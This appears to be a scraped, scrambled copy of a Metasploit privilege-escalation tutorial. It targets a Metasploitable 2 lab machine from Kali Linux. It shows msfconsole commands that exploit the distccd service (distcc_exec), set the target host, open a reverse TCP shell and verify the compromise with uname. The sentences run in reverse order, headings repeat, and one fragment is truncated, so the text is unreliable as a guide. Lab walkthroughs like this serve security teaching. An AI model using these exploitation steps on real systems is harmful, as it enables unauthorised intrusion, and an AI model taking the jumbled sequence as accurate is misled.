- Upload exploit suggester to local manual#
- Upload exploit suggester to local upgrade#
- Upload exploit suggester to local full#
While still in the basic command shell, press Ctrl-Z to background the session.
Upload exploit suggester to local upgrade#
To use Metasploit's local exploit suggester, we need to upgrade our basic Unix command shell to a Meterpreter session. We can see that a command shell was opened, and running uname -a verifies we have compromised the target. Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58: i686 GNU/Linux Started reverse TCP double handler on 10.10.0.1:4444 Use the run command, which is just a shorter alias for exploit: msf5 exploit(unix/misc/distcc_exec) > run Use the set command to specify the appropriate IP address of the target: msf5 exploit(unix/misc/distcc_exec) > set rhosts 10.10.0.50 It looks like we only need to set the remote host address since the remote port is already set using the default port number. RHOSTS yes The target address range or CIDR identifier Name Current Setting Required Description Module options (exploit/unix/misc/distcc_exec): We can now see the available settings with the options command: msf5 exploit(unix/misc/distcc_exec) > options
Upload exploit suggester to local full#
To load the module, type use followed by the full path of the module: msf5 > use exploit/unix/misc/distcc_exec
# Name Disclosure Date Rank Check DescriptionĠ exploit/unix/misc/distcc_exec excellent Yes DistCC Daemon Command Execution We can search for the exploit using the search command: msf5 > search distcc Unfortunately, this version of the program allows a remote attacker to execute arbitrary commands on the server. Metasploitable contains a vulnerable service called distccd, which is used to distribute program compilation across multiple systems, speeding things up by taking advantage of combined processor power. ***rting the Metasploit Framework console.\ Type msfconsole in the terminal to launch it. The first thing we need to do is get a session with low privileges on the target.
You can set up or use a similar pentesting lab - or the same one - to follow along with the guide below. To run through the process, we're using Kali Linux as the attacking machine and Metasploitable 2 as the target.
Upload exploit suggester to local manual#
We could go the manual route, but like always, Metasploit makes it easy to perform local privilege escalation and get root with its exploit suggester module. Now what? Privilege escalation is a vast field and can be one of the most rewarding yet frustrating phases of an attack. So you've managed to get a shell on the target, but you only have measly low-level privileges.
0 kommentar(er)
